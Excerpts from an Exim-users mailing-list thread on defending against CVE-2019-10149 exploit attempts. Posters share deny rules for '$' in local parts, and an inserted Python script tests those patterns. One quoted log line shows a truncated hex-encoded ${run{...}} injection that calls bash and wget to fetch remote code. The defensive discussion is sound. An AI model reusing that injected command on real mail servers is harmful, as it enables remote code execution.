On 23.06.19 at 21:02, Jeremy Harris via Exim-users wrote:
> deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
> message = no mate
>
> This is perhaps over-broad - a dollar sign in a local-part
> is strictly legitimate per the standards. However, it's
> not something most strictly-As
On 23.06.19 at 21:02, Jeremy Harris via Exim-users wrote:
>
> deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
> message = no mate
>
> This is perhaps over-broad - a dollar sign in a local-part
> is strictly legitimate per the standards. However, it's
> not something most strictly-
Best I have so far is adding '$' to the trailing case in the Debian
default list of bad chars in local parts of local addresses:
  CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$
which gets used here:
  deny
    domains = +local_domains
    local_parts = CHECK_RCPT_LOCAL_LOCALP
On Sun, Jun 23, 2019 at 07:37:37PM +0200, Heiko Schlittermann via Exim-users
wrote:
> It *seems* that the attackers test for the Exim version in the SMTP
> banner. In servers having 4.92 I do not see as many attempts as on
> 4.87->4.91. But there may be other things influencing this.
I have 4 ex
or, indeed just \$ within the []:
CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[\$@%!/|`#&?]
and I've belatedly noticed that this has already been posted by Marius,
sorry!
Apologies for the noise.
cheers,
calum.
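An added example, not part of any post in this thread: a quick offline check that both CHECK_RCPT_LOCAL_LOCALPARTS variants posted above reject a local part containing '$' while still accepting "user+suffix". It assumes Python's re module stands in for Exim's PCRE matching and that the patterns are written as they read after Exim's string expansion (so "\$" and "\\\$" become a literal dollar match); the sample local parts are constructed.

```python
import re

# Variant 1 from the thread: '$' added as a third list item.
# Assumption: "^.*\\\$" in the macro expands to the regex ^.*\$
LIST_TRAILING = [r"^[.]", r"^.*[@%!/|`#&?]", r"^.*\$"]

# Variant 2 from the thread: '$' placed inside the character class.
# Assumption: "\$" inside [] expands to a literal '$'
LIST_IN_CLASS = [r"^[.]", r"^.*[$@%!/|`#&?]"]


def first_match(local_part, patterns):
    """Return the first pattern that matches local_part, or None."""
    for pattern in patterns:
        if re.search(pattern, local_part):
            return pattern
    return None


def is_denied(local_part, patterns):
    """True if the deny statement using this list would fire."""
    return first_match(local_part, patterns) is not None


# Constructed local parts: value is the expected "denied" result.
SAMPLES = {
    "user": False,
    "user+suffix": False,               # sub-addressing must keep working
    "first.last": False,
    ".hidden": True,                    # leading dot
    "user%relay": True,                 # percent-hack routing
    "root+${run{CONSTRUCTED}}": True,   # shape seen in the logged attempts
    "a$b": True,                        # legal per the standards, denied anyway
}


def evaluate(patterns):
    """Map each sample local part to whether the list denies it."""
    return {lp: is_denied(lp, patterns) for lp in SAMPLES}


if __name__ == "__main__":
    for lp, expected in SAMPLES.items():
        got = is_denied(lp, LIST_IN_CLASS)
        print(f"{lp!r:32} denied={got} expected={expected}")
```

The "a$b" row is the over-breadth already noted in the thread: a dollar sign is legitimate in a local part, so this rule trades standards compliance for a quieter queue.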
On 23/06/2019 7:57 pm, Calum Mackay wrote:
Best I have so far is adding '$' to the t
On 23/06/2019 18:51, Calum Mackay via Exim-users wrote:
> by any chance, please, would anyone happen to have an acl_smtp_rcpt
> example that catches these particular exploit attempts — so my queue
> doesn't fill up with these frozen msgs — /but/ still allows me to have
> "user+suffix@domain" which
On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:
CVE-2019-10149 is not that it is possible to submit a mail that ends
up frozen in the queue. CVE is a remote command execution
vulnerability. The fix for CVE-2019-10149 does not remove the
possibility to generate frozen mails in the queu
Hello,
Thomas Hager via Exim-users (Fri 21 Jun 2019 21:26:11
CEST):
> > 2019-06-20 15:13:33 Received from <> H=(.de)
> > [89.248.171.57] P=smtp S=1114
> > 2019-06-20 15:13:33 routing failed for
> > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> > k\x2dcertificate\x20\x2dT